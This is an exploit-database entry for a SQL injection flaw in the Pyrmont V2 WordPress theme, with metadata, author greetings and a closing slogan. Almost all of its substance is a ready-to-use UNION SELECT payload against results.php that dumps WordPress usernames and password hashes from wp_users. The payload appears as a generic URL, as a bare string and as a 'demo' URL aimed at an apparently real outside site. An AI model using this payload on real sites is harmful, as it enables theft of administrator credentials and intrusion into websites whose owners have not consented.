WordPress Plugin Pyrmont 2.x - SQL Injection

Author: Gamoscu
type: webapps
platform: php
port: 
date_added: 2009-12-17 
date_updated: 2015-07-12 
verified: 0 
codes: OSVDB-61407;CVE-2009-4424 
tags: 
aliases:  
screenshot_url:  
application_url: 

#############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability

# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2

# Author: Gamoscu

# Site: www.1923turk.biz

#  Site: http://gamoscu.wordpress.com/

##############################################################




# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users

           -9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users


# Demo: http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users

##############################################################
# Greetz: Manas58 Baybora Delibey Tiamo Psiko
##############################################################


Vatan Lafla Deðil Eylemle Sevilir